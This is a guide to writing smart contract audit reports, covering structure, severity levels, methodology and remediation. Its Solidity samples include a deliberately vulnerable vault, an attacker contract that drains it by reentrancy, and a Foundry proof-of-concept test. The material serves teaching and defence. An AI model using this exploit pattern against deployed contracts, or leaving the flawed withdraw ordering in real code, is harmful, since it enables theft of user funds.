Developing a Smart Contract Audit Report
An audit report is the document a protocol team publishes before launch. Investors, users, and integrators read it to assess risk. A bad report is either an empty formality or so technically overloaded that no one understands the real risks. A good report honestly describes what was found, what was fixed, and what remains.
Important: an auditor cannot guarantee that no bugs exist. An auditor can say: "I checked these specific properties with these specific methods and found no problems." An honest report states exactly that.
Professional report structure
Executive Summary
The first section, and the one read by non-developers: investors, partners, lawyers. It contains the overall conclusion (were critical issues found? were they fixed?), the scope (which contracts, commit hash, chains), the methodology (manual review, fuzzing, formal verification?), and a summary table of findings by severity.
The summary table must be on the first page:
| Severity | Found | Fixed | Acknowledged | Disputed |
|---|---|---|---|---|
| Critical | 2 | 2 | 0 | 0 |
| High | 4 | 3 | 1 | 0 |
| Medium | 7 | 6 | 1 | 0 |
| Low | 12 | 8 | 4 | 0 |
| Informational | 15 | 5 | 10 | 0 |
If critical issues remain unfixed or merely acknowledged, that is a red flag for the reader. The auditor cannot force fixes, only document them.
Scope and limitations
A precise scope is mandatory. Without it, it is unclear what exactly was checked. It must include:
- Specific files and functions (not "entire protocol")
- Repository commit hash
- What wasn't in scope (oracles, admin keys, frontend)
- Timeline constraints and their impact on review depth
A professional auditor writes honestly: "Due to code volume and time constraints, fuzzing covered only the core swap functions; the lending module was checked by manual review only." This protects the auditor and helps the reader gauge the confidence level of each conclusion.
Methodology
Explains how the audit was conducted:
Manual code review — line-by-line reading focused on known vulnerability classes: reentrancy, integer overflow/underflow, access control, front-running, oracle manipulation, flash loan attack vectors.
Automated analysis — Slither, Mythril, 4naly3er. These tools catch obvious patterns but generate false positives; their results need manual validation.
Fuzzing — Foundry invariant testing or Echidna. Define invariants (properties that must always hold) and run millions of random inputs against them.
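The shape of a Foundry invariant test can be sketched as follows. The Vault contract, its function names, and the solvency property are all hypothetical, invented here for illustration; only the test structure (targetContract plus an invariant_ function) is standard Foundry:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import {Test} from "forge-std/Test.sol";

// Minimal illustrative vault (hypothetical, not from any audited codebase).
contract Vault {
    mapping(address => uint256) public balances;
    uint256 public totalDeposits;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
        totalDeposits += msg.value;
    }

    function withdraw(uint256 amount) external {
        balances[msg.sender] -= amount; // reverts on underflow in 0.8+
        totalDeposits -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

contract VaultInvariantTest is Test {
    Vault vault;

    function setUp() public {
        vault = new Vault();
        // The fuzzer will call deposit()/withdraw() in random sequences
        // with random arguments and senders.
        targetContract(address(vault));
    }

    // Property that must hold after ANY call sequence:
    // the vault never owes more ether than it actually holds.
    function invariant_solvency() public view {
        assertGe(address(vault).balance, vault.totalDeposits());
    }
}
```

Running forge test then exercises the target contract with randomized call sequences and reports the shortest sequence that breaks the property, if any.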
Formal verification (if applied) — Certora Prover or the K framework. Mathematically proves stated properties. Expensive, so reserved for the most critical components.
Finding description format
Each finding is a separate section with a standard structure:
Header with ID and severity. Example: "H-01: Reentrancy in withdraw() allows draining funds". The ID is for tracking, the severity for prioritizing.
Severity classification:
- Critical — loss of user funds, or complete attacker control of the contract
- High — partial loss of funds, bypass of critical logic
- Medium — invariant violation without direct fund loss, denial of service
- Low — suboptimal behavior, a potential vector only under unlikely conditions
- Informational — code quality, gas inefficiency, best-practice violations
Vulnerability description. What exactly is wrong and why: the specific function, code lines, and exploitation mechanism.
Proof of Concept. Mandatory for critical and high findings: a Foundry test demonstrating the exploitation.
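For the reentrancy example used in the header above, a PoC might look like the following self-contained sketch. VulnerableVault, Attacker, and all amounts are hypothetical, constructed only to show what a convincing PoC section contains:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import {Test} from "forge-std/Test.sol";

// Hypothetical vulnerable contract: external call happens BEFORE
// the balance is zeroed, so a receiver can re-enter withdraw().
contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0; // too late
    }
}

contract Attacker {
    VulnerableVault immutable vault;

    constructor(VulnerableVault v) { vault = v; }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    receive() external payable {
        // Re-enter while our recorded balance is still non-zero.
        if (address(vault).balance >= 1 ether) vault.withdraw();
    }
}

contract ReentrancyPoC is Test {
    function test_drain() public {
        VulnerableVault vault = new VulnerableVault();
        vm.deal(address(vault), 10 ether); // other users' funds
        vm.deal(address(this), 1 ether);   // attacker's stake

        Attacker attacker = new Attacker(vault);
        attacker.attack{value: 1 ether}();

        // Attacker deposited 1 ether and extracted the whole vault.
        assertEq(address(vault).balance, 0);
        assertGt(address(attacker).balance, 10 ether);
    }
}
```

A PoC of this shape lets the team reproduce the issue with a single forge test run and later reuse the same test to confirm the fix.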
Remediation recommendation. Be concrete: not "add a check", but "add the nonReentrant modifier from OpenZeppelin's ReentrancyGuard and move the state update before the external call (Checks-Effects-Interactions pattern)".
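A remediated version of the hypothetical withdraw() from the reentrancy example might look like this (the import path shown is the OpenZeppelin Contracts 5.x layout; 4.x used security/ReentrancyGuard.sol):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";

contract FixedVault is ReentrancyGuard {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Checks-Effects-Interactions: zero the balance BEFORE the external
    // call; nonReentrant adds a second, independent layer of defense.
    function withdraw() external nonReentrant {
        uint256 amount = balances[msg.sender];
        balances[msg.sender] = 0;                         // effect first
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction last
        require(ok, "transfer failed");
    }
}
```

Pairing CEI with the modifier is deliberate: CEI removes the root cause, while nonReentrant protects against regressions if the function is later modified.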
Team response and status. After the team responds, add a status: Fixed (with commit hash), Acknowledged (the team knows and accepts the risk), or Disputed (the team disagrees).
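Putting the pieces above together, a single finding entry might read as follows. Everything in it is an invented example, including the placeholder commit hash:

```markdown
H-01: Reentrancy in withdraw() allows draining funds

Severity: High    Status: Fixed (commit <hash>)

Description. withdraw() sends ether to msg.sender before zeroing
balances[msg.sender], so a malicious receiver can re-enter and
withdraw repeatedly until the contract is empty.

Proof of Concept. See test/ReentrancyPoC.t.sol (Foundry test).

Recommendation. Zero the balance before the external call
(Checks-Effects-Interactions) and add OpenZeppelin's nonReentrant
modifier as defense in depth.

Team response. Fixed as recommended; fix verified by the auditor.
```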
Appendices
Appendix A: Test Coverage. The percentage of lines/functions/branches covered by tests (forge coverage --report lcov). Low coverage (below 70%) is a risk in itself.
Appendix B: Automated Tools Output. Raw Slither/Mythril output with notes on which results are false positives and why.
Appendix C: Code Quality. Style, documentation (NatSpec), events for monitoring, upgrade pattern, admin key risks.
Work with team
A quality audit is a dialogue, not a monologue. After the initial review, the auditor sends the findings to the team; the team fixes them and explains any disputed items. The auditor then verifies the fixes in a separate review. The final report reflects the final state of the code.
Best practice: publish not only the final report but also a changelog of what was found and what was fixed. This demonstrates the team's maturity.
Timeline: 1-3 weeks depending on code volume and review depth. An average DeFi protocol (5-10 contracts, 2,000-5,000 lines of Solidity) takes about 2 weeks.







